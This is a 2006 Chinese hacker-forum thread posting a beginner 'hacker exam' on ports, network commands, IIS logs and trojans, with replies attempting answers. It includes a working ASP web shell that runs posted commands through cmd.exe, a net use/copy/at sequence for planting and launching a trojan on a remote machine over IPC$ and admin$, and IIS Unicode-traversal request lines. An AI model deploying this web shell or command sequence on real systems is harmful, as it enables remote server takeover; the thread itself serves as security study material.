<% 
If (IsObject(oFile)) Then 
On Error Resume Next 
Response.Write Server.HTMLEncode(oFile.ReadAll) 
oFile.Close 
Call oFileSys.DeleteFile(szTempFile, True) 
End If 
%> 
 
 
十、 
存在IIS或CGI漏洞，并对脚本有执行权限，如何进行入侵？（只要求叙述到如何上传文件，其他思路会酌情给分） 
那么，如何在不打补丁的情况下避免这种攻击的发生？ 
十一、OSI模型中哪一层上有协议？分别是什么？ 
十二、观察ping命令的返回包的TTL值，可以了解到什么？ 
十三、从网关得到采样 
目标 IP 192.168.0.1 端口80 源 IP　192.168.0.3 端口 3646 
目标 IP 192.168.0.1 端口80 源 IP　192.168.0.3 端口 3647 
目标 IP 192.168.0.1 端口69 源 IP　192.168.0.3 端口 69 
请问 这可能是什么样的会话，采用什么协议，进行什么样的作业？ 
十四、谈谈你对hacker和网络安全的认识 

A-MD wrote: 
一、 
http://192.168.0.1网站的IP,是个内网IP哦 
http://xyz.3322.org网站的FQDN名 
http://3232235521 ？？？ 
三个连接指向同一目标网站，那么它们分别是什么意义？ 
二、 
常用端口识别 
20 21 23 
25 80 110 
139 443 445 
三、 
试述下列命令作用 
c:\>net use \\211.87.194.121\ipc$ “123456”/user:”administrator” 以用户administrator密码123456建立与211.87.194.121的IPC$连接，成功后………… 
c:\>net use z: \\211.87.194.121\c$ 把211.87.194.121的C盘映射为本地的Z盘，以后用211.87.194.121的C盘就像是用本地硬盘一样了 
c:\>net time \\211.87.194.121 看211.87.194.121上现在的时间 
c:\>copy abc.exe \\211.87.194.121\admin$\system32 
把abc.exe （大多是木马服务端）文件复制到211.87.194.121的X：\windows\system32里面（X为系统盘） 
这个大题是最有把握的，原因吗………… 
四、 
试述下列命令的区别，如何防止该命令在本地或远程运行 
c:\>at \\211.87.194.121 21:05 abc.exe 211.87.194.121上的时间为21:05时运行abc.exe 
c:\>at 21:05 \\211.87.194.121\admin$\system32\abc.exe 本地时间为21:05时运行211.87.194.121上的abc.exe 
只有在启动了schedule服务后at命令才能被执行 
五、 
W3SVC日志是什么？分析下面这段日志。 INTERNET信息服务WWW日志 
2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /MSADC/root.exe /c+dir 403 - 
2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /c/winnt/system32/cmd.exe /c+dir 401 - 
2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /d/winnt/system32/cmd.exe /c+dir 401 - 
2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 - 
2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /HEAD 200 - 
分析我酌情给分。 
具体每行的情况不是很清楚，好像是有人利用UNICODE漏洞看能不能用DIR命令获得211.87.215.81上的文件列表，如果成功的话就会有进一步的动作了 
六、 
netstat命令有何作用，举出两个参数进行说明。 
七、 
试述木马的一些基本特征。 
CS模型，开机自启等 
八、 
如何利用脚本实现对ftp的自动操作？ 
九、 
下面是一个ASP木马，请找出支持这一程序的关键点。 
<%@ Language=VBScript %> 
<% 
Dim oScript 
Dim oScriptNet 
Dim oFileSys, oFile 
Dim szCMD, szTempFile 
On Error Resume Next 
Set oScript = Server.CreateObject("WSCRIPT.SHELL") 
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK") 
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject") 
szCMD = Request.Form(".CMD") 
If (szCMD <> "") Then 
szTempFile = "C:\" & oFileSys.GetTempName( ) 
Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True) 
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0) 
End If 
%> 
 
 
" method="POST"> 
 
 
 
 
<% 
If (IsObject(oFile)) Then 
On Error Resume Next 
Response.Write Server.HTMLEncode(oFile.ReadAll) 
oFile.Close 
Call oFileSys.DeleteFile(szTempFile, True) 
End If 
%> 
 
 
十、 
存在IIS或CGI漏洞，并对脚本有执行权限，如何进行入侵？（只要求叙述到如何上传文件，其他思路会酌情给分） 
那么，如何在不打补丁的情况下避免这种攻击的发生？ 
十一、OSI模型中哪一层上有协议？分别是什么？ 
应用层：TELNET,SMTP,HTTP,FTP,DNS 
传输层：TCP,UDP,SPX 
网络层：IP,IPX,ARP,ICMP,RARP 
十二、观察ping命令的返回包的TTL值，可以了解到什么？ 
可以知道对方把信息传过来时经过了几个路由器 
十三、从网关得到采样 
目标 IP 192.168.0.1 端口80 源 IP　192.168.0.3 端口 3646 
目标 IP 192.168.0.1 端口80 源 IP　192.168.0.3 端口 3647 
目标 IP 192.168.0.1 端口69 源 IP　192.168.0.3 端口 69 
请问 这可能是什么样的会话，采用什么协议，进行什么样的作业？ 
192.168.0.1是一个WWW服务器，192.168.0.3正在访问，并且是开了两个网页，HTTP协议，最后一个端口69的不知道 

作者: nainiou    时间: 2006-1-2 20:56     标题: 一份黑客菜鸟试卷


看的懂一些,大多都不懂,所以我是菜鸟!

作者: x86    时间: 2006-1-2 22:46     标题: 一份黑客菜鸟试卷


一、 

http://192.168.0.1 

http://xyz.3322.org 

http://3232235521 

三个连接指向同一目标网站，那么它们分别是什么意义？ 

第一个是目标服务器的ip地址，第二个则是其域名地址，其真正ip则需要dns服务来解析。第三个则为目标ip的10进制形式

二、 

常用端口识别 

20 21 23 

25 80 110 

139 443 445 

20 ftp文本传输端口

21 ftp二进制流传输端口

23 telnet服务

25 smtp

80 web服务

139 netbios

学习完计算机网络，至少会懂一半.

作者: kkting    时间: 2006-1-3 17:50     标题: 一份黑客菜鸟试卷


下面引用由nainiou在 2006/01/02 08:56pm 发表的内容：

看的懂一些,大多都不懂,所以我是菜鸟!


那些不懂，说出来大家一起讨论。

作者: 李风    时间: 2006-1-3 22:19     标题: 一份黑客菜鸟试卷


我不懂，是个菜菜小鸟。

作者: divico    时间: 2006-1-6 18:52     标题: 一份黑客菜鸟试卷


才勉强能回答5道吧．．．．

答对几道才算过关啊？？

作者: xue82043703    时间: 2006-1-7 08:43     标题: 一份黑客菜鸟试卷


妈妈,这个也叫菜鸟做的啊!偶那不成小小菜鸟了,偶把偶会说的说下吧,其他不知道楼主看给几分吧!

第一题,第一个是IP地址啊.下面那个是不是网址,第3个一串数字的不懂

第二题,23是TELNET.80是HTTP,其他不清楚

第三题,第一段是进到那个IP的机器里.拥护是超级,密码为123456,后面几个没试过哦

第四和第五不知道

第六题,那个命令是浏览本机目前开的端口号的吧.防止木马有点作用

第七题,特征是隐蔽.控制力强,传播比病毒烂点CS模式是服务器/客户机 开机自启就不清楚了

接下去的都不知道了


作者: bluexxk    时间: 2006-3-16 18:08     标题: 一份黑客菜鸟试卷


只知道第一题和第二题的部分


作者: king5312    时间: 2006-3-17 00:54     标题: 一份黑客菜鸟试卷


一、 

http://192.168.0.1  目标网站IP！

http://xyz.3322.org   目标网站域名

http://3232235521  ？？

三个连接指向同一目标网站，那么它们分别是什么意义？ 

二、 

常用端口识别 

21 80 139  443 不是黑客就用这几个

三、 

试述下列命令作用 

c:\>net use \\211.87.194.121\ipc&#36; “123456”/user:”administrator” 

用账号administrator密码123456与211.87.794.121建立ICP&#36;连接

c:\>net use z: \\211.87.194.121\c&#36; 

映射211.87.194.121的C盘为本地Z盘

c:\>net time \\211.87.194.121 

查看211.87.194.121的时间

c:\>copy abc.exe \\211.87.194.121\admin&#36;\system32 

拷贝ABC.EXE到211.87.194.121的SYSTEM32下

四、 

试述下列命令的区别，如何防止该命令在本地或远程运行 

c:\>at \\211.87.194.121 21:05 abc.exe 

当目标机211.87.194.121到21：05时运行ABC.EXE

c:\>at 21:05 \\211.87.194.121\admin&#36;\system32\abc.exe 

当本地时间到21：05运行目标机211.87.194.121SYSTEM32目录下的ABC.EXE

五、 

W3SVC日志是什么？分析下面这段日志。 

2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /MSADC/root.exe /c+dir 403 - 

2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /c/winnt/system32/cmd.exe /c+dir 401 - 

2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /d/winnt/system32/cmd.exe /c+dir 401 - 

2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 - 

2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /HEAD 200 - 

分析我酌情给分。 

这个没有注意过！不懂！

六、 

netstat命令有何作用，举出两个参数进行说明。 

查询网路资料

七、 

试述木马的一些基本特征。 

以窃取中马者密码为主，

八、 

如何利用脚本实现对ftp的自动操作？ 

半桶水响！


作者: ouli    时间: 2006-3-31 12:39     标题: 一份黑客菜鸟试卷


只能答上6题~~

作者: 鸿    时间: 2006-4-1 15:09     标题: 一份黑客菜鸟试卷


我不懂，是个菜菜小鸟。

作者: 33415790    时间: 2006-4-2 10:32     标题: 一份黑客菜鸟试卷


...........





欢迎光临 黑色海岸线论坛 (http://bbs.thysea.com/)

Powered by Discuz! 7.2